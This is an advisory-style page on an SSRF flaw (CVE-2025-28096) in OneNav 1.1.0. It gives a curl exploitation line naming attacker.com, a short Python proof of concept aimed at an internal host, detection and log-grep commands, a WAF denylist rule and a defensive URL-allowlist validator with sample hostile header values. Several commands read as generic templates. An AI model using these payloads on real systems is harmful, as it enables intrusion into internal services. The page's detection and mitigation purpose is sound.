How the CVE Works
CVE-2025-28096 is a critical server-side request forgery (SSRF) vulnerability in OneNav 1.1.0 that lets attackers manipulate custom HTTP headers to forge server-side requests. User-supplied values in headers are insufficiently sanitized, so an attacker can redirect the application's internal HTTP requests to arbitrary domains. This can be used to bypass firewall restrictions, reach sensitive internal services, or exfiltrate data. The flaw stems from improper validation in the header-parsing mechanism, where crafted `X-Forwarded-For` or similar headers trigger unauthorized outbound connections; if internal APIs or admin panels are reachable this way, it could lead to remote code execution (RCE).
DailyCVE Form
Platform: OneNav
Version: 1.1.0
Vulnerability: SSRF
Severity: Critical
Date: 04/07/2025
What Undercode Says:
Exploitation:
curl -H "X-Forwarded-For: http://attacker.com" http://victim.com/api/fetch
Detection:
grep -r "header\s=\s\$_SERVER" /var/www/onenav/
Mitigation:
1. Patch to OneNav 1.1.1+.
2. Input sanitization:
// Reject the header unless it matches the trusted origin; the original check was inverted (it rejected trusted values).
if (!preg_match('/^https?:\/\/trusted\.com(\/|$)/', $_SERVER['HTTP_X_FORWARDED_FOR'] ?? '')) { die("Invalid header"); }
3. Network controls:
iptables -A OUTPUT -d 192.168.0.0/16 -j DROP
Exploit Code (PoC):
import requests
headers = {"X-Forwarded-For": "http://internal-db.local"}
r = requests.get("http://onenav-victim.com/proxy", headers=headers)
print(r.text)
Log Analysis:
tail -f /var/log/apache2/access.log | grep -E "internal|localhost"
WAF Rule:
if ($http_x_forwarded_for ~ (localhost|127.0.0.1)) { return 403; }
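The one-line preg_match check under Mitigation and the nginx rule above both work by pattern-matching the header string, which is fragile: a prefix regex accepts `http://trusted.com.evil.com`, and a denylist of `localhost|127.0.0.1` misses `[::1]`, `10.x` addresses and credential tricks such as `http://user@trusted.com@evil.com`. The following is an added example (not OneNav's code or the advisory author's) of the allowlist approach a defender would put in front of any header value that becomes an outbound request target. It parses the value as a URL, rejects non-HTTP schemes and any literal loopback, private, link-local or reserved IP, and then requires the parsed hostname to be on an allowlist; the allowlist and the sample header values are constructed for the example.

```python
# Added example: allowlist validation for a header value used as a
# server-side request target. Not OneNav code; ALLOWED_HOSTS and
# SAMPLE_HEADER_VALUES are constructed for illustration.
import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist of hosts the application may fetch from.
ALLOWED_HOSTS = {"trusted.com", "cdn.trusted.com"}


def is_internal_ip(host: str) -> bool:
    """True when host is a literal IP in loopback, private, link-local,
    multicast, reserved or unspecified space (IPv4 or IPv6)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # not a literal IP address
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_target(value: str) -> tuple:
    """Return (ok, reason) for a header value that would become the
    target of a server-side HTTP request."""
    if not value:
        return False, "empty value"
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed: %r" % parts.scheme
    # urlsplit handles userinfo and IPv6 brackets, so hostname is the real
    # target even for values like http://user@trusted.com@evil.com/
    host = parts.hostname
    if not host:
        return False, "no host"
    if is_internal_ip(host):
        return False, "internal address: %s" % host
    if host not in ALLOWED_HOSTS:
        return False, "host not allowlisted: %s" % host
    return True, "ok"


# Constructed header values, not captured traffic.
SAMPLE_HEADER_VALUES = [
    "http://trusted.com/feed.xml",
    "http://attacker.com",
    "http://127.0.0.1:8080/admin",
    "http://trusted.com.evil.com/",
    "http://[::1]/",
    "http://user@trusted.com@evil.com/",
]


def check_values(values):
    """Evaluate each header value; returns {value: (ok, reason)}."""
    return {v: validate_target(v) for v in values}


if __name__ == "__main__":
    for value, (ok, reason) in check_values(SAMPLE_HEADER_VALUES).items():
        print("%-7s %-40s %s" % ("ALLOW" if ok else "REJECT", value, reason))
```

The check matches on the parsed hostname, not on a substring of the raw header, which is what defeats the suffix and userinfo cases. It does not resolve allowlisted hostnames, so a host that is allowlisted but resolves to an internal address (DNS rebinding) still needs the egress controls from the Mitigation section to be caught.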
Impact Assessment:
nmap -p 80,443 --script http-ssrf 192.168.1.0/24
Patch Verification:
diff -u /var/www/onenav/header.php patched_header.php
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28096
Extra Source Hub:
Undercode